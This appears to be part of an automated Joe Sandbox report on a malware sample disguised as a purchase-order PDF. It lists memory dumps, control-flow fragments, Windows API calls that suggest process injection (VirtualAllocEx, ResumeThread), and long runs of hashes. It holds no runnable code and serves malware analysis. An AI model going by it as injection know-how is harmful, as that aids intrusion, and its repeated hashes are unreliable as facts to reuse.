                                                                                  • Opcode ID: a8429cdc6996cb1622c908d6a9d5737f2adb975a5d195d71ae034d8bf7e43f70
                                                                                  • Instruction ID: cbfbee7079bbf01d263d8dc2751709c32c00e0433a7e2c742944894777320db1
                                                                                  • Opcode Fuzzy Hash: a8429cdc6996cb1622c908d6a9d5737f2adb975a5d195d71ae034d8bf7e43f70
                                                                                  • Instruction Fuzzy Hash: 5B213575D003098FDB10DFAAC4857EEBBF4AF88224F54842ED559A7240CB78A944CFA0

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 197 91a6689-91a670b VirtualAllocEx 200 91a670d-91a6713 197->200 201 91a6714-91a6739 197->201 200->201
                                                                                  APIs
                                                                                  • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 091A66FE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.1466294641.00000000091A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_91a0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 4275171209-0
                                                                                  • Opcode ID: a9435863b935d349c14b45637d11b4473a35ab68a0e1c0e5fedfd22fa3eff6b8
                                                                                  • Instruction ID: 655f52523ada7b8b650b72579e6212378072785e6e2d1d9e12562a971ff922a5
                                                                                  • Opcode Fuzzy Hash: a9435863b935d349c14b45637d11b4473a35ab68a0e1c0e5fedfd22fa3eff6b8
                                                                                  • Instruction Fuzzy Hash: EC1159759003498FDF14DFAAC844BEEBBF5AF88320F14881DE519A7250C7759944DFA0

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 220 91a6690-91a670b VirtualAllocEx 223 91a670d-91a6713 220->223 224 91a6714-91a6739 220->224 223->224
                                                                                  APIs
                                                                                  • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 091A66FE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.1466294641.00000000091A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_91a0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 4275171209-0
                                                                                  • Opcode ID: 69a7a784a4c4fcee6379d8e34aa36a57b0e65df9108233caa3606b065bb0edc8
                                                                                  • Instruction ID: 5b34161a853813b8ab2c9d86e6e4ed0c4fa0d6931c75731db5943a3d9dffd6e3
                                                                                  • Opcode Fuzzy Hash: 69a7a784a4c4fcee6379d8e34aa36a57b0e65df9108233caa3606b065bb0edc8
                                                                                  • Instruction Fuzzy Hash: BC1137759003499FDB10DFAAC844BDEBBF5EF88724F148819E519A7250CB75A940DFA0

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 213 8cdbf39-8cdbf8a 215 8cdbf8c-8cdbf8f 213->215 216 8cdbf92-8cdbfbd OutputDebugStringW 213->216 215->216 217 8cdbfbf-8cdbfc5 216->217 218 8cdbfc6-8cdbfda 216->218 217->218
                                                                                  APIs
                                                                                  • OutputDebugStringW.KERNEL32(00000000), ref: 08CDBFB0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.1465856845.0000000008CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_8cd0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugOutputString
                                                                                  • String ID:
                                                                                  • API String ID: 1166629820-0
                                                                                  • Opcode ID: 4f63d5a433048816a7b2ec036b62333ef415fe20aaaaea8d26e1e008df93cf91
                                                                                  • Instruction ID: 852044f03d79ecc66624e2ff1d0eed85d8ee17042dd7405b3d1408c0b6320c99
                                                                                  • Opcode Fuzzy Hash: 4f63d5a433048816a7b2ec036b62333ef415fe20aaaaea8d26e1e008df93cf91
                                                                                  • Instruction Fuzzy Hash: 541144B5C0065A9FCB14DF9AD444B9EFBB0BF48320F11821AD858A7240C7746944CFA5

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 205 8cdb264-8cdbf8a 208 8cdbf8c-8cdbf8f 205->208 209 8cdbf92-8cdbfbd OutputDebugStringW 205->209 208->209 210 8cdbfbf-8cdbfc5 209->210 211 8cdbfc6-8cdbfda 209->211 210->211
                                                                                  APIs
                                                                                  • OutputDebugStringW.KERNEL32(00000000), ref: 08CDBFB0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.1465856845.0000000008CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_8cd0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugOutputString
                                                                                  • String ID:
                                                                                  • API String ID: 1166629820-0
                                                                                  • Opcode ID: 0d9f708faf1109357c0c8fbc3c602c805f475e81d7b592fb7fbeaa6acc71ee4e
                                                                                  • Instruction ID: 8b234a88bd26554c6f9dcad0ee92450e518b3a1b46d4c72b5922525ae89b3cf8
                                                                                  • Opcode Fuzzy Hash: 0d9f708faf1109357c0c8fbc3c602c805f475e81d7b592fb7fbeaa6acc71ee4e
                                                                                  • Instruction Fuzzy Hash: 521144B5C0460A9BCB14DF9AC444B9EFBF4FB48320F10811AE958A3340C778A940CFA5
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.1466294641.00000000091A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_91a0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID: ResumeThread
                                                                                  • String ID:
                                                                                  • API String ID: 947044025-0
                                                                                  • Opcode ID: 49b49a5579a8742be4829968c368bf8eefa6c5743f6b0347e1037bca584c0731
                                                                                  • Instruction ID: b9a6cc004f37603020a96747d33dce7bfa2ad4a9ca4129b668afddf518da6735
                                                                                  • Opcode Fuzzy Hash: 49b49a5579a8742be4829968c368bf8eefa6c5743f6b0347e1037bca584c0731
                                                                                  • Instruction Fuzzy Hash: E51146B59003498FDB24DFAAC4847EEFBF5EF88224F24881DD55AA7240CB799945CF90
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.1466294641.00000000091A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_91a0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID: ResumeThread
                                                                                  • String ID:
                                                                                  • API String ID: 947044025-0
                                                                                  • Opcode ID: c002dd09d3ab65410eb32de15e25edd4ca4aa29d058fe24a4551c3f9f0d4b727
                                                                                  • Instruction ID: b6c89cd3b41a988cc22a670abd1165866d8c5c9e41b5ba405d97affa8b4c1e2f
                                                                                  • Opcode Fuzzy Hash: c002dd09d3ab65410eb32de15e25edd4ca4aa29d058fe24a4551c3f9f0d4b727
                                                                                  • Instruction Fuzzy Hash: 781136B5D003498FDB24DFAAC84579EFBF5EF88624F248819D519A7240CB79A944CFA0
                                                                                  APIs
                                                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 091AAE7D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.1466294641.00000000091A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_91a0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessagePost
                                                                                  • String ID:
                                                                                  • API String ID: 410705778-0
                                                                                  • Opcode ID: 3eb0ad42eaee4f2fb482e1f4e80413b855b1f39a71fd7dad5f9a684c9d48151b
                                                                                  • Instruction ID: 48e9f7be5a3b4d29fb79b988269a0bd9ddc6172c811af7231ea68708ac12f892
                                                                                  • Opcode Fuzzy Hash: 3eb0ad42eaee4f2fb482e1f4e80413b855b1f39a71fd7dad5f9a684c9d48151b
                                                                                  • Instruction Fuzzy Hash: 5C1103B5900349DFDB20DF9AC984BDEFBF8EB48324F108419E918A7240D375A944CFA5
                                                                                  APIs
                                                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 091AAE7D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.1466294641.00000000091A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_91a0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessagePost
                                                                                  • String ID:
                                                                                  • API String ID: 410705778-0
                                                                                  • Opcode ID: 64fd5c95828efdc1cc6823f65113aad92bebb9a50d600e1cf58b88d0fdb9a7ea
                                                                                  • Instruction ID: 3e30abcf874fe706eaba8377e6fee1dcc39863facbc7650dfe09f595a4010009
                                                                                  • Opcode Fuzzy Hash: 64fd5c95828efdc1cc6823f65113aad92bebb9a50d600e1cf58b88d0fdb9a7ea
                                                                                  • Instruction Fuzzy Hash: 291110B59003499FDB20DF9AC484BDEBFF4EB48320F20845DE458A7610C374A944CFA1
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0321E2FE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.1460113401.0000000003210000.00000040.00000800.00020000.00000000.sdmp, Offset: 03210000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_3210000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID: HandleModule
                                                                                  • String ID:
                                                                                  • API String ID: 4139908857-0
                                                                                  • Opcode ID: 209a3b0c5c8b756184164ce317caf532835ee6d406b459bdeea09f1b1fa2d410
                                                                                  • Instruction ID: d59336a96ed20076c5c9991e9a83b3dfe78ecca06e96544b85e80e27cd3cd028
                                                                                  • Opcode Fuzzy Hash: 209a3b0c5c8b756184164ce317caf532835ee6d406b459bdeea09f1b1fa2d410
                                                                                  • Instruction Fuzzy Hash: DA1110B6C003498FCB20DF9AC844BDEFBF4AF88320F15841AD819A7200C379A545CFA1
                                                                                  APIs
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 08CDC04F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.1465856845.0000000008CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_8cd0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseHandle
                                                                                  • String ID:
                                                                                  • API String ID: 2962429428-0
                                                                                  • Opcode ID: e3e83c991bbe451378b178635e680e9b8a0fe9aa9afc0117cb09334d16ff2ceb
                                                                                  • Instruction ID: 619e183f36e4a6e8e672227ae5f854641e8a5624a05840450bf5654be98d8d33
                                                                                  • Opcode Fuzzy Hash: e3e83c991bbe451378b178635e680e9b8a0fe9aa9afc0117cb09334d16ff2ceb
                                                                                  • Instruction Fuzzy Hash: B11128B18007498FDB20DF9AC4457DEBBF4EB88320F108419D558A3341D778A944CFA5
                                                                                  APIs
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 08CDC04F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.1465856845.0000000008CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_8cd0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseHandle
                                                                                  • String ID:
                                                                                  • API String ID: 2962429428-0
                                                                                  • Opcode ID: a790c518f6a76b7d1e6a183635510e02d258d6702f933f0cdff2c3247d6393e8
                                                                                  • Instruction ID: abd3ccd0d4e6a5d5e73208ba4d9ad57215ece92daf7f77a0e448383b4430e06c
                                                                                  • Opcode Fuzzy Hash: a790c518f6a76b7d1e6a183635510e02d258d6702f933f0cdff2c3247d6393e8
                                                                                  • Instruction Fuzzy Hash: B41133B18003498FDB20DF9AC448BDEBBF4EF48320F20846AD558A7351D778A984CFA5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.1459300731.000000000159D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0159D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_159d000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1009d2c79b759ebeb61769f21d76b9cb1cce7b31c3e4f973e79709276c734fa3
                                                                                  • Instruction ID: def749f671b982d2378080b8f767045e39bdede8efac073a9eee5a5c362a05db
                                                                                  • Opcode Fuzzy Hash: 1009d2c79b759ebeb61769f21d76b9cb1cce7b31c3e4f973e79709276c734fa3
                                                                                  • Instruction Fuzzy Hash: 94318D750093808FCB078F64D894615BFB1FF46324F1985EAC9458F2A7C33A984ADB62
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.1459251178.000000000158D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0158D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_158d000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c87a01a262665a7df34966a054582633154a20e829b975ae6b20a78f7982b4b0
                                                                                  • Instruction ID: c7dbe61844f7e03a57344f9e8fbb8f5b48eece4571946a59511b2726eee31556
                                                                                  • Opcode Fuzzy Hash: c87a01a262665a7df34966a054582633154a20e829b975ae6b20a78f7982b4b0
                                                                                  • Instruction Fuzzy Hash: A721F471504240DFDB05EF54D9C0B2ABFB5FB84618F20C56AD8051E296C336D456CAB2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.1459300731.000000000159D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0159D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_159d000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0d02d5b0c1dbf433f143641293502145010144187990e5a5c4e98fbd8389a165
                                                                                  • Instruction ID: f07173a1632deadfe6a596046d8afcc01157f4673b22b89dd87f89fc39aac075
                                                                                  • Opcode Fuzzy Hash: 0d02d5b0c1dbf433f143641293502145010144187990e5a5c4e98fbd8389a165
                                                                                  • Instruction Fuzzy Hash: 7D2122B6604304DFDF01DF54D884B16BBB5FB84214F20C96DD9090F396C33AD846DA62
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.1459300731.000000000159D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0159D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_159d000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 248c8a56073140d587a9aa98390c0ac39d32dbc9f3d72851a4ee905fe5506a36
                                                                                  • Instruction ID: 8394e1c4e66085ab1849382f52cc9dd10975f0463db8ebbcfdca87d3b1b5bf92
                                                                                  • Opcode Fuzzy Hash: 248c8a56073140d587a9aa98390c0ac39d32dbc9f3d72851a4ee905fe5506a36
                                                                                  • Instruction Fuzzy Hash: 0921D075604204DFDF05DF94D984B2ABBB5FB84625F24C9ADD8494F282C33AD846CA62
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.1459251178.000000000158D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0158D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_158d000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                                                  • Instruction ID: 56b8c85c4b93aa0187e71e77e52da0ff95acf8c09383be287a5b22aa04abddad
                                                                                  • Opcode Fuzzy Hash: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                                                  • Instruction Fuzzy Hash: D0119D76504280DFCB16DF54D5C4B1ABFB2FB84224F2486AAD8490B696C33AD456CBA1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.1459300731.000000000159D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0159D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_159d000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                                                  • Instruction ID: f8201c95c9b2449679e9b74c349066903efb2f0521fa5831294a3fc7ae4e554e
                                                                                  • Opcode Fuzzy Hash: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                                                  • Instruction Fuzzy Hash: 5B11BB79508280CFCB02CF58D5C0B19BFB2FB84225F24C6A9D8494F693C33AD40ACB62
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.1459251178.000000000158D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0158D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_158d000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a82b925714eae4860e846c51ec13c2116c1b243fd61f1fd0353e66cb13a51c86
                                                                                  • Instruction ID: 77611dada348d3c037bdf12eee8c02940499a16d834d721fd235f69fcd4d5d64
                                                                                  • Opcode Fuzzy Hash: a82b925714eae4860e846c51ec13c2116c1b243fd61f1fd0353e66cb13a51c86
                                                                                  • Instruction Fuzzy Hash: FC01F7711043849AF7107EA5CC84B6ABFE8FF45665F14C91AEE089E2C2C6399400CB72
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.1459251178.000000000158D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0158D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_158d000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 513f6aec3da02e111138be96635ca59a5d07b2990181b451d1b5c04a827e1745
                                                                                  • Instruction ID: 45facfaae5bd49ea0c264ad9a74cee9e4337570b6821611b04c1042fed0b6568
                                                                                  • Opcode Fuzzy Hash: 513f6aec3da02e111138be96635ca59a5d07b2990181b451d1b5c04a827e1745
                                                                                  • Instruction Fuzzy Hash: FCF062715043849EE710AE1ACC84B66FFE8EB45674F18C55AED485E2C7C2799844CBB1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.1466294641.00000000091A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_91a0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c8c1d46a5fb74838fdcb425583e7a1b24a18ce0a6588d2381be8f9881189f196
                                                                                  • Instruction ID: 19244797921de01a6441e22d6df3d0a34a997074a17ba4681f716a2880e16b9e
                                                                                  • Opcode Fuzzy Hash: c8c1d46a5fb74838fdcb425583e7a1b24a18ce0a6588d2381be8f9881189f196
                                                                                  • Instruction Fuzzy Hash: CBE10674E002198FDB14DFA8D584AAEFBB2FF89345F248169E418AB355D731AD42CF60
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.1466294641.00000000091A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_91a0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8250d16ef0f8854abf31a3f6925d0f9ec7563f2b33ed2dbac357e33ff68b4102
                                                                                  • Instruction ID: f4e3cd470d39db0a30208ba635849c866b0e59ab429948ec0acdd641d06a9473
                                                                                  • Opcode Fuzzy Hash: 8250d16ef0f8854abf31a3f6925d0f9ec7563f2b33ed2dbac357e33ff68b4102
                                                                                  • Instruction Fuzzy Hash: 25E11874E002198FDB14DFA9D580AAEFBB2FF89305F248169E418AB355D735AD42CF60
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.1466294641.00000000091A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_91a0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0ed13fc3ee9303414e46bd551f6a8ae8b6221fc7e432e0cc162d02dce7339a8a
                                                                                  • Instruction ID: 7fe0885004aade63f4ce638b948cd129f2ffb9ab66499b3041a92dd859ffe31a
                                                                                  • Opcode Fuzzy Hash: 0ed13fc3ee9303414e46bd551f6a8ae8b6221fc7e432e0cc162d02dce7339a8a
                                                                                  • Instruction Fuzzy Hash: F0E1F774E002198FDB14DFA9D580AAEFBB2FF89305F248169E414AB355D771AD42CFA0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.1466294641.00000000091A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_91a0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 71c473297467ecf7ceddc739a23b905364a95f371e76b756608725f5f1b28f1c
                                                                                  • Instruction ID: 423fa6b88064d85ca2ef3ea0a1589fb8d2e51bb828c263f8612c2d9fd67e5159
                                                                                  • Opcode Fuzzy Hash: 71c473297467ecf7ceddc739a23b905364a95f371e76b756608725f5f1b28f1c
                                                                                  • Instruction Fuzzy Hash: 30E1F774E002198FDB14DFA9D680AAEFBB2FF89305F248169E414AB355D731AD42CF61
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.1466294641.00000000091A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_91a0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b0f8db54f592ea7f4e9c9dca4689170bdfce9af6ba0ba2d1568a05f31a5f788e
                                                                                  • Instruction ID: 18639b3e7b1d0eafd2df47db7267543bed251ba9c48f85bdbad3c0ded2f1aabc
                                                                                  • Opcode Fuzzy Hash: b0f8db54f592ea7f4e9c9dca4689170bdfce9af6ba0ba2d1568a05f31a5f788e
                                                                                  • Instruction Fuzzy Hash: 97E11574E002598FDB14DFA8D580AAEFBB2FF89345F248169E418AB355D731AD42CF60
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.1465856845.0000000008CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_8cd0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 714d9dbc02e45074cb3e743d4610a39e5cedf99cd66cef350df44338a1555997
                                                                                  • Instruction ID: 628b1d0405b0062c2682ec07a84bbc937e27b7903a1d3c165c3f64472a99374a
                                                                                  • Opcode Fuzzy Hash: 714d9dbc02e45074cb3e743d4610a39e5cedf99cd66cef350df44338a1555997
                                                                                  • Instruction Fuzzy Hash: A3E1F674E012598FDB14DFA9C580AAEFBF2FF89305F248169D518AB356C730A946CF60
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.1465856845.0000000008CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_8cd0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6a869b9d06727915c332b3f2eff6928be0e2b5150a51c5eba9c7834862209e54
                                                                                  • Instruction ID: c0d15e89acb6bb8cf37c7683f3b98806e314221f95c98223611ac0d79886fa40
                                                                                  • Opcode Fuzzy Hash: 6a869b9d06727915c332b3f2eff6928be0e2b5150a51c5eba9c7834862209e54
                                                                                  • Instruction Fuzzy Hash: 53E1F574E012598FDB14DFA9C580AAEFBB2FF89305F248169D514AB355DB30AD42CFA0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.1465856845.0000000008CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_8cd0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d471d2cf58dbde407c624c79f28d82fa123757e63076dd7ce7764347afe90e83
                                                                                  • Instruction ID: da7ae1d5e34b195647f2077fb7a6df03c86a3d7bdafb70ded723042c9c1cf778
                                                                                  • Opcode Fuzzy Hash: d471d2cf58dbde407c624c79f28d82fa123757e63076dd7ce7764347afe90e83
                                                                                  • Instruction Fuzzy Hash: A2E10674E01259CFDB14DFA9C580AAEFBB2FF89305F248169D518AB355C730A942CF60
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.1465856845.0000000008CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_8cd0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 864889c9a0936b6c4c3e03c920141338bc93d75c9d892f93678b9911b1557ee0
                                                                                  • Instruction ID: 5ef604a1a872b69793d80e1cc397c3dd2a89d6f2e263fb5d349aae51f7975419
                                                                                  • Opcode Fuzzy Hash: 864889c9a0936b6c4c3e03c920141338bc93d75c9d892f93678b9911b1557ee0
                                                                                  • Instruction Fuzzy Hash: 6AE1F674E01259CFDB14DFA9C580AAEBBB2FF89305F24C169D914AB355DB30A942CF60
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.1465856845.0000000008CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_8cd0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 336a0f21f206fc40633edbbd38685d58dca806f93f32592c2c1b484084220270
                                                                                  • Instruction ID: 1fbacaba4594846f6d0685f54d579e1308d9bbfe45c8f2845a18c49465c3fede
                                                                                  • Opcode Fuzzy Hash: 336a0f21f206fc40633edbbd38685d58dca806f93f32592c2c1b484084220270
